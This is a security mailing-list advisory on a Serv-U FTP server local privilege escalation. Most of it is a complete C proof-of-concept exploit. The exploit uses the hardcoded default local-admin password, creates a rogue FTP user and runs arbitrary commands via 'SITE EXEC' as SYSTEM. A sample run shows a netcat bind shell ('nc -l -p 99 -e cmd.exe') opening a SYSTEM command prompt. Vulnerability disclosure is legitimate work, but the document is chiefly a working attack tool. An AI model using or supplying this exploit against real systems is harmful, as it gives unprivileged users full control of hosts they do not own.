[NT] Serv-U Local Privilege Escalation Vulnerability

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Serv-U Local Privilege Escalation Vulnerability
------------------------------------------------------------------------


SUMMARY

" <http://www.serv-u.com/> Serv-U is a powerful, easy-to-use, 
award-winning FTP server created by Rob Beckers."

It is possible for a local unprivileged user to execute commands with 
SYSTEM privileges using a problem with Serv-U administration.

DETAILS

Vulnerable Systems:
 * Serv-U version 4.x through 5.1.0.0 inclusive

The Serv-U FTP server in all its platforms has a local administration 
account that can be used to configure the server. This account has a 
default login and password credentials and is only available through the 
loopback interface. An unprivileged user can connect to the server with 
the default login information and use the "SITE EXEC" command to execute 
arbitrary commands. The commands are run with SYSTEM privileges hence 
turning Serv-U to a conduit through which administrative commands can be 
run.

A proof of concept code that demonstrates this vulnerability is presented 
below:
/*
 * Hax0rcitos proudly presents
 * Serv-u Local Exploit >v3.x. (tested also against last version 5.1.0.0)
 *
 * All Serv-u Versions have default Login/password for local 
Administration.
 * This account is only available to connect in the loopback interface, so 
a
 * local user will be able to connect to Serv-u with this account and 
create
 * an ftp user with execute rights. after the user is created, just 
connect
 * to the ftp server and execute a raw "SITE EXEC" command. the program 
will
 * be execute with SYSTEM privileges.
 *
 * Copyright (c) 2003-2004  Haxorcitos.com . All Rights Reserved.
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED "AS IS"
 * AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION
 * WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED.
 *
 *
 * Date:   10/2003
 * Author: Andr s Tarasc  Acunha
 *
 * Greetings to: #haxorcitos - #localhost and #!dsr blackxors =)
 *
 * Tested Against Serv-u 4.x and v5.1.0.0

     G:\exploit\serv-U\local>whoami
    INSANE\aT4r

    G:\exploit\serv-U\local>servulocal.exe "nc -l -p 99 -e cmd.exe"
    Serv-u >3.x Local Exploit by Haxorcitos

    <220 Serv-U FTP Server v5.0 for WinSock ready...
    >USER LocalAdministrator
    <331 User name okay, need password.
    ******************************************************
    >PASS #l@$ak#.lk;0@P
    <230 User logged in, proceed.
    ******************************************************
    >SITE MAINTENANCE
    ******************************************************
    [+] Creating New Domain...
    <200-DomainID=3
    220 Domain settings saved
    ******************************************************
    [+] Domain Haxorcitos:3 Created
    [+] Setting New Domain Online
    <220 Server command OK
    ******************************************************
    [+] Creating Evil User
    <200-User=haxorcitos
    200 User settings saved
    ******************************************************
    [+] Now Exploiting...
    >USER haxorcitos
    <331 User name okay, need password.
    ******************************************************
    >PASS whitex0r
    <230 User logged in, proceed.
    ******************************************************
    [+] Now Executing: nc -l -p 99 -e cmd.exe
    <220 Domain deleted
    ******************************************************
     G:\exploit\serv-U\local>nc localhost 99
    Microsoft Windows XP [Versi n 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\>whoami
    whoami
    NT AUTHORITY\SYSTEM
     C:\>
 */

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>
#include <io.h>
#include <process.h>

//Responses
#define BANNER                  "220 "
#define USEROK                  "331 User name okay"
#define PASSOK                  "230 User logged in, proceed."
#define ADMOK                   "230-Switching to SYSTEM MAINTENANCE 
mode."
#define DOMAINID                "200-DomainID="
//Commands

#define XPLUSER                    "USER haxorcitos\r\n"
#define XPLPASSWORD                "PASS whitex0r\r\n"
#define USER                    "USER LocalAdministrator\r\n"
#define PASSWORD                "PASS #l@$ak#.lk;0@P\r\n"

#define MAINTENANCE             "SITE MAINTENANCE\r\n"
#define EXIT                    "QUIT\r\n"
char newdomain[]="-SETDOMAIN\r\n"
         "-Domain=haxorcitos|0.0.0.0|2121|-1|1|0\r\n"
         "-TZOEnable=0\r\n"
         " TZOKey=\r\n";
/*               "-DynDNSEnable=0\r\n"
         " DynIPName=\r\n";
*/
char deldomain[]="-DELETEDOMAIN\r\n"
         "-IP=0.0.0.0\r\n"
         " PortNo=2121\r\n";

char newuser[] =
        "-SETUSERSETUP\r\n"
        "-IP=0.0.0.0\r\n"
        "-PortNo=2121\r\n"
        "-User=haxorcitos\r\n"
        "-Password=whitex0r\r\n"
        "-HomeDir=c:\\\r\n"
        "-LoginMesFile=\r\n"
        "-Disable=0\r\n"
        "-RelPaths=1\r\n"
        "-NeedSecure=0\r\n"
        "-HideHidden=0\r\n"
        "-AlwaysAllowLogin=0\r\n"
        "-ChangePassword=0\r\n"
        "-QuotaEnable=0\r\n"
        "-MaxUsersLoginPerIP=-1\r\n"
        "-SpeedLimitUp=0\r\n"
        "-SpeedLimitDown=0\r\n"
        "-MaxNrUsers=-1\r\n"
        "-IdleTimeOut=600\r\n"
        "-SessionTimeOut=-1\r\n"
        "-Expire=0\r\n"
        "-RatioUp=1\r\n"
        "-RatioDown=1\r\n"
        "-RatiosCredit=0\r\n"
        "-QuotaCurrent=0\r\n"
        "-QuotaMaximum=0\r\n"
        "-Maintenance=None\r\n"
        "-PasswordType=Regular\r\n"
        "-Ratios=None\r\n"
        " Access=c:\\|RELP\r\n";

#define localport 43958
#define localip "127.0.0.1"

char cadena[1024];
int rec,domain;
/******************************************************************************/

void ParseCommands(int sock, char *data, int ShowSend, int showResponses,
char *response) {
 send(sock,data,strlen(data),0);
 if (ShowSend) printf(">%s",data);
 Sleep(100);
 do {
     rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
     if (rec<=0) return;
     if (showResponses) printf("<%s",cadena);
     if (strncmp(cadena, DOMAINID,strlen(DOMAINID))==0)
        domain=atoi(cadena+strlen(DOMAINID));
 //} while (strncmp(cadena,response,strlen(response))!=0);
 } while (strstr(cadena,response)==NULL);
 printf("******************************************************\r\n");
}
/******************************************************************************/
int main(int argc, char* argv[])
{
    WSADATA ws;
    int sock,sock2;

    struct sockaddr_in haxorcitos;
    struct sockaddr_in xpl;

printf("Serv-u >3.x Local Exploit by Haxorcitos\r\n\r\n");
if (argc<2) {
    printf("USAGE:   ServuLocal.exe \"command\"\r\n");
    printf("Example: ServuLocal.exe \"nc.exe -l -p 99 -e cmd.exe\"");
     return(0);
}

    if      (WSAStartup( MAKEWORD(2,2), &ws )!=0) {
        printf(" [-] WSAStartup() error\n");
        exit(0);
    }

    haxorcitos.sin_family = AF_INET;
    haxorcitos.sin_port = htons(localport);
    haxorcitos.sin_addr.s_addr = inet_addr(localip);
    sock=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
    connect(sock,( struct sockaddr *)&haxorcitos,sizeof(haxorcitos));
    rec=recv(sock,cadena,sizeof(cadena),0); cadena[rec]='\0';
    printf("<%s",cadena);

    ParseCommands(sock,USER,1,1,USEROK);
    ParseCommands(sock,PASSWORD,1,1,PASSOK);
    ParseCommands(sock,MAINTENANCE,1,0,"230 ");

    printf("[+] Creating New Domain...\r\n");
    ParseCommands(sock,newdomain,0,1,BANNER);
    printf("[+] Domain Haxorcitos:%i Created\n",domain);

/* Only for v5.x
    printf("[+] Setting New Domain Online\r\n");
    sprintf(cadena,"-SERVERCOMMAND\r\n-ID=%i\r\n
Command=DomainOnline\r\n",domain);
    ParseCommands(sock,cadena,0,1,BANNER);
*/
    printf("[+] Creating Evil User\r\n");
    ParseCommands(sock,newuser,0,1,"200 ");
    Sleep(1000);

    printf("[+] Now Exploiting...\r\n");
    xpl.sin_family = AF_INET;
    xpl.sin_port = htons(2121);
    xpl.sin_addr.s_addr = inet_addr(localip);
    sock2=socket (AF_INET, SOCK_STREAM, IPPROTO_TCP);
    connect(sock2,( struct sockaddr *)&xpl,sizeof(xpl));
    rec=recv(sock2,cadena,sizeof(cadena),0); cadena[rec]='\0';
    ParseCommands(sock2,XPLUSER,1,1,USEROK);
    ParseCommands(sock2,XPLPASSWORD,1,1,PASSOK);
    printf("[+] Now Executing: %s\r\n",argv[1]);
    sprintf(cadena,"site exec %s\r\n",argv[1]);
    send(sock2,cadena,strlen(cadena),0);
    shutdown(sock2,SD_BOTH);
    Sleep(100);
    ParseCommands(sock,deldomain,0,1,BANNER);
    send(sock,EXIT,strlen(EXIT),0);
    shutdown(sock,SD_BOTH);
    closesocket(sock);
    closesocket(sock2);

    return 0;
}


ADDITIONAL INFORMATION

The information has been provided by  <mailto:at4r@ciberdreams.com> aT4r 
ins4n3.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.